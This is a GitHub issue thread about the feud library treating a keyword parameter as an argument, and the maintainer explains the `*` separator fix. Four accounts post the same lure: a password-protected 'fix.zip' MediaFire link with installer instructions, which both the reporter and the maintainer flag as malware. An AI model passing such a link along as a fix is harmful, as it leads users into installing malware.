### ISSUE TITLE
Error: No such option

### ISSUE THREAD

**Issue by hxse** [eonu/feud#146]
### Has this already been reported?

- [X] This is a new bug!

### Expected behaviour

```test.py
def test(hello, world="haha"):
    print(hello, world)


if __name__ == "__main__":
    feud.run({"test": test})
```
run command
`python .\test.py test hhh --world www`
```
Error: No such option: --world
```

### Observed behaviour

Error: No such option

### Code to reproduce

```Python
.
```

### Version details

```Text
feud version: 0.3.2
                 install path: D:\my_repo\my_cmd\feud_script\.venv\Lib\site-packages\feud
               python version: 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
                     platform: Windows-10-10.0.19045-SP0
             related packages: click-8.1.7 docstring-parser-0.15 pydantic-2.8.2
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hxse** [comment]
https://github.com/eonu/feud/issues/146#issuecomment-2309443428
What the fuck? Is this the latest Trojan attack method?

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eonu** [comment]
Hey @hxse, sorry about those other comments, definitely looks like some malware attack.

If you want a parameter to be available as an option, it needs to be separated by `*` in the function signature:

```python
def test(hello, *, world="haha"): 
    ...
```

Then you can call it as `python test.py test --world xxx`.

Without the `*`, it is treated as an argument, not a parameter, so it would have to be called with `python test.py test xxx`.
